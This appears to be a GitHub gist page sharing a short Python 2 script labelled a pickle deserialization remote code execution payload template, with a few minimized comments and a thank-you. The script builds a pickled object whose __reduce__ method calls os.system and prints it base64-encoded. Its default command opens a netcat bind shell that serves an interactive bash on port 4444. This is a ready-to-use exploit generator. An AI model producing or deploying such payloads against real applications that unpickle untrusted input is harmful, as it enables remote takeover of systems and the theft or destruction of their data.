Python's Pickle Remote Code Execution payload template.
| #!/usr/bin/python | |
| # | |
| # Pickle deserialization RCE payload. | |
| # To be invoked with command to execute at it's first parameter. | |
| # Otherwise, the default one will be used. | |
| # | |
| import cPickle | |
| import sys | |
| import base64 | |
| DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444" | |
| COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND | |
| class PickleRce(object): | |
| def __reduce__(self): | |
| import os | |
| return (os.system,(COMMAND,)) | |
| print base64.b64encode(cPickle.dumps(PickleRce())) |
This comment has been minimized.
This comment has been minimized.
|
Thanks much =) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Usage example: